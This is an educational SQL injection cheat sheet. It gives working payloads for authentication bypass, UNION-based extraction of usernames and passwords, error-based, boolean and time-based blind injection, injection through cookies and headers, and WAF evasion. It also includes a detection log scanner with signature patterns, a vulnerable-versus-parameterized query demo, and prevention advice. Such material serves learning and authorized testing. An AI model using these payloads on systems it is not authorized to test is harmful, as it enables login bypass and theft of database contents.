SQL Injection (SQLi) Cheat Sheet
Practical Guide for Learning
This cheat sheet is intended for education, labs, CTFs, and authorized security testing only.
Table of Contents
- Introduction to SQL Injection
- How SQL Queries Work
- Common SQL Injection Types
- Authentication Bypass
- UNION-Based SQLi
- Error-Based SQLi
- Boolean Blind SQLi
- Time-Based Blind SQLi
- Database Enumeration
- Database-Specific Payloads
- SQLi in POST Requests
- SQLi in Cookies & Headers
- Common WAF Bypass Concepts
- Secure Coding & Prevention
- Testing Methodology
- Useful Tools
- Quick Payload Reference
1. Introduction to SQL Injection
SQL Injection (SQLi) is a vulnerability that occurs when user input is inserted directly into SQL queries without proper sanitization or parameterization.
Example vulnerable PHP code:
$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
If the input is neither validated nor parameterized, an attacker can change the structure of the query rather than just its values.
2. How SQL Queries Work
Normal query:
SELECT * FROM users WHERE username='admin' AND password='123456';
If input becomes:
admin' --
The final query becomes:
SELECT * FROM users WHERE username='admin' -- ' AND password='123456';
The `--` sequence comments out the rest of the query, so the password check is never evaluated. In MySQL, `--` must be followed by a space (or another whitespace character) to count as a comment, which is why the payloads here are written as `admin' --` with a trailing space.
3. Common SQL Injection Types
| Type | Description |
|---|---|
| UNION-Based | Appends an attacker-controlled SELECT to the original query's result set |
| Error-Based | Uses database errors to leak information |
| Boolean Blind | Uses TRUE/FALSE responses |
| Time-Based Blind | Uses delays to confirm injections |
| Out-of-Band | Uses external channels like DNS |
| Second-Order SQLi | Payload is stored safely first and executed later by a different query |
4. Authentication Bypass
Basic Payloads
' OR '1'='1
admin' --
' OR 1=1 --
Example
Vulnerable query:
SELECT * FROM users WHERE username='$user' AND password='$pass';
Injected username:
admin' --
Result:
SELECT * FROM users WHERE username='admin' -- ' AND password='x';
5. UNION-Based SQLi
UNION appends the rows of a second SELECT to the result set of the original query; both SELECTs must return the same number of columns with compatible types, which is why the column count is found first.
Step 1: Find Column Count
ORDER BY 1 --
ORDER BY 2 --
ORDER BY 3 --
Or:
UNION SELECT NULL --
UNION SELECT NULL,NULL --
UNION SELECT NULL,NULL,NULL --
Step 2: Find Visible Columns
UNION SELECT 1,2,3 --
Step 3: Extract Data
UNION SELECT username,password,3 FROM users --
6. Error-Based SQLi
Uses database errors to reveal information.
MySQL Version Extraction
' AND extractvalue(1,concat(0x7e,version())) --
Current Database
' AND updatexml(1,concat(0x7e,database()),1) --
MSSQL
' AND 1=CONVERT(int,@@version) --
7. Boolean Blind SQLi
Application behavior changes based on TRUE/FALSE conditions.
TRUE Condition
' AND 1=1 --
FALSE Condition
' AND 1=2 --
Extract First Character
' AND SUBSTRING(database(),1,1)='a' --
8. Time-Based Blind SQLi
Used when the response shows neither errors nor content differences; the only signal left is response time.
MySQL
' AND SLEEP(5) --
PostgreSQL
'; SELECT pg_sleep(5) --
MSSQL
'; WAITFOR DELAY '0:0:5' --
Conditional Delay
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0) --
9. Database Enumeration
Current Database
SELECT database();
List Tables
SELECT table_name FROM information_schema.tables;
List Columns
SELECT column_name FROM information_schema.columns WHERE table_name='users';
Extract Data
SELECT username,password FROM users;
10. Database-Specific Payloads
MySQL
Version
SELECT @@version;
Current User
SELECT user();
Current Database
SELECT database();
PostgreSQL
Version
SELECT version();
Current Database
SELECT current_database();
MSSQL
Version
SELECT @@version;
Current User
SELECT SYSTEM_USER;
Oracle
Version
SELECT banner FROM v$version;
Current User
SELECT user FROM dual;
11. SQLi in POST Requests
SQL Injection is not limited to URL parameters.
Example POST request:
POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
username=admin'--&password=test
12. SQLi in Cookies & Headers
Some applications store user-controlled values inside:
- Cookies
- User-Agent
- X-Forwarded-For
- Referer
Example:
Cookie: trackingId=' AND SLEEP(5)--
13. Common WAF Bypass Concepts
Alternative Comments
/**/
Example:
UNION/**/SELECT/**/1,2,3
Case Manipulation
uNiOn SeLeCt
URL Encoding
%27 is the URL-encoded form of the single quote (')
Inline Comments
SEL/**/ECT
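As an added example (not part of the cheat sheet), the defender's counterpart to the evasions above: a small Python log scanner that reverses each of them (URL-decoding, inline-comment removal, case folding) before matching signatures for the comment, tautology, UNION, delay and error-based payloads listed in sections 4 to 8. The access-log lines, the signature set and the function names are all constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Signatures for the payload families of sections 4-8, applied AFTER normalization.
SIGNATURES = {
    "comment_terminator": re.compile(r"--|#|/\*"),
    "boolean_or_tautology": re.compile(r"\b(?:and|or)\s*['\"]?\w+['\"]?\s*=\s*['\"]?\w+"),
    "union_select": re.compile(r"\bunion\s*(?:all\s*)?select"),
    "time_delay": re.compile(r"\b(?:sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s*delay\b"),
    "error_based": re.compile(r"\b(?:extractvalue|updatexml)\s*\(|convert\s*\(\s*int"),
}
REQUEST_LINE = re.compile(r'"(?:GET|POST|PUT|DELETE) (\S+) HTTP/')

def normalize(value):
    """Undo the section-13 evasions before matching: URL-decode twice (catches
    double encoding), delete /**/ inline comments (UNION/**/SELECT, SEL/**/ECT),
    collapse whitespace and fold case (uNiOn SeLeCt)."""
    decoded = unquote_plus(unquote_plus(value))
    stripped = re.sub(r"/\*.*?\*/", "", decoded)
    return re.sub(r"\s+", " ", stripped).lower().strip()

def findings_for_value(value):
    """Names of the signature families that match one parameter value."""
    text = normalize(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_log(lines):
    """Return (client, parameter, families) for every query parameter that matches."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        query = m.group(1).partition("?")[2]  # keep a raw '#' in the query string
        for param, raw in parse_qsl(query, keep_blank_values=True):
            families = findings_for_value(raw)
            if families:
                hits.append((client, param, families))
    return hits

SAMPLE_LOG = [  # constructed access-log lines, not real traffic
    '10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /item?id=5 HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2025:10:00:01 +0000] "GET /item?id=5%27%20AND%20SLEEP(5)-- HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2025:10:00:02 +0000] "GET /item?id=1%20uNiOn/**/SeLeCt/**/1,2,3 HTTP/1.1" 500 0',
    '10.0.0.8 - - [01/Jan/2025:10:00:03 +0000] "GET /search?q=O%27Brien HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2025:10:00:04 +0000] "GET /item?id=5%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 9000',
]
```

Running `scan_log(SAMPLE_LOG)` flags the three injected requests and leaves the legitimate `O'Brien` search alone; a signature list that skipped the normalization step would miss the `uNiOn/**/SeLeCt` line entirely.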
14. Secure Coding & Prevention
Use Prepared Statements
Secure PHP Example
$stmt = $pdo->prepare("SELECT * FROM users WHERE username=? AND password=?");
$stmt->execute([$username, $password]);
Input Validation
- Validate data types
- Use allowlists
- Reject unexpected characters
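An added example (not the page's code) that runs the bypass from sections 2 and 4 against both the string-built query and its parameterized form from the Secure PHP Example, then adds the allowlist check from the Input Validation list as a second layer. It uses Python's sqlite3 instead of PHP/PDO so it runs stand-alone; the users table, its rows and the allowlist pattern are constructed here.

```python
import re
import sqlite3

USERNAME_ALLOWLIST = re.compile(r"^[A-Za-z0-9_]{1,32}$")  # constructed policy

def make_db():
    """Constructed in-memory stand-in for the page's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    """Same construction as the page's vulnerable PHP: input is spliced into the
    SQL text, so a quote closes the string literal and -- comments out the
    password check. (SQLite does not need the trailing space MySQL requires.)"""
    query = ("SELECT username FROM users WHERE username='" + username
             + "' AND password='" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username, password):
    """The Secure PHP Example in sqlite3 form: ? placeholders send the values
    separately from the SQL text, so quotes and comment sequences stay data."""
    query = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None

def login_validated(conn, username, password):
    """Input validation as defence in depth: reject usernames outside the
    allowlist before any query runs. Not a substitute for placeholders."""
    if not USERNAME_ALLOWLIST.match(username):
        return None
    return login_parameterized(conn, username, password)
```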
Least Privilege
Database accounts should only have required permissions.
Hide Errors
Disable verbose SQL error messages in production.
15. Professional Testing Methodology
Step 1: Identify Input Points
Check:
- GET parameters
- POST data
- Cookies
- Headers
- JSON bodies
Step 2: Test for Errors
Try:
'
Look for:
- SQL syntax errors
- HTTP 500
- Different responses
Step 3: Determine Injection Type
- Error-Based
- UNION-Based
- Blind
- Time-Based
Step 4: Enumerate Database
- Database name
- Tables
- Columns
- Sensitive data
Step 5: Document Findings
Always document:
- Vulnerable parameter
- Request/response
- Impact
- Remediation
16. Useful Tools
| Tool | Purpose |
|---|---|
| sqlmap | Automated SQLi testing |
| Burp Suite | Intercepting requests |
| OWASP ZAP | Web security testing |
| ffuf | Fuzzing |
| Nmap NSE | Database discovery |
17. Quick Payload Reference
Basic Test
'
Authentication Bypass
' OR '1'='1
Comment Operators
--
#
/* */
UNION Test
UNION SELECT NULL,NULL --
Database Version
@@version
Current Database
database()
Sleep Payload
SLEEP(5)
Boolean Test
AND 1=1
AND 1=2
Final Notes
SQL injection testing is not only about memorizing payloads.
A strong penetration tester understands:
- SQL query logic
- Database behavior
- Web application flow
- Secure coding principles
- Detection methodology
- Reporting and remediation
The best hackers are the ones who deeply understand systems, not just payload lists.